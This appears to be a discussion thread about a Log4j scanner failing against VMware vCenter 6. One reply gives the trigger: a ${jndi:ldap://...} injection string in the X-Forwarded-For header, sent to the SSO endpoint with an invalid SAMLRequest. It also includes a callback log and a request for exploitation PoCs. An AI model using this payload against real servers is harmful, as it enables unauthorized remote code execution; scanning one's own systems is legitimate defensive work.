[Discussion]: Right parameters to check VMware VCenter 6 Log4j vulnerability

[FabrizioA]

Hi,

this script doesn't works with VMware VCenter 6 destination server.
I've tested it inside LAN but it returns always the message like "No vulnerable destination"..

Do this script was tested with VMware VCenter appliance?

Thank you 👋🏻

[matthoskins1980]

The vCenter web ui root url is not affected directly. To trigger the bug, you have to hit the SSO endpoint (which is logged in sso.log on the vcenter server). Specifically, your request must include the X-Forwarded-For header with the ${jndi:ldap://xxx} string and pass a invalid SAMLRequest variable. vCenter's SSO module will then log whatever value is in the X-Forwarded-For header to the sso.log file because of the bad SAMLRequest variable in the query string, and trigger the exploit.

you should scan the following url:

https://hostname of vcenter/websso/SAML2/SSO/vsphere.local?SAMLRequest=garbage_gets_logged

[LogSpider]

very helpful, thank you! it is difficult to know the exactly url of services that are affected. already scanned many sites with reverse proxies and diffrent services behind. what about elastic search or nextcloud?

{'timestamp': '2021-12-16T06:39:21.991765586Z', 'host': '1.2.3.4fga8ah845t485e845ab584fda845re485485ba84r545ae845b485are484rb85.interact.sh', 'remote_address': '5.6.7.8'}

[mazen160]

Let's keep this open for discussion, an excellent idea is to maintain a KB of exploitation PoCs for products, similar to @matthoskins1980 explanation :)

[daemenseth]

Is there some any news on it. Is there someone wo has a kb of exploination pocs

[LogSpider]

questions over questions, you must know the exact URL pattern where log4j acts for every service. tried to scan affected unifi network controller. tried many things, don't know how i should find out what to scan exactly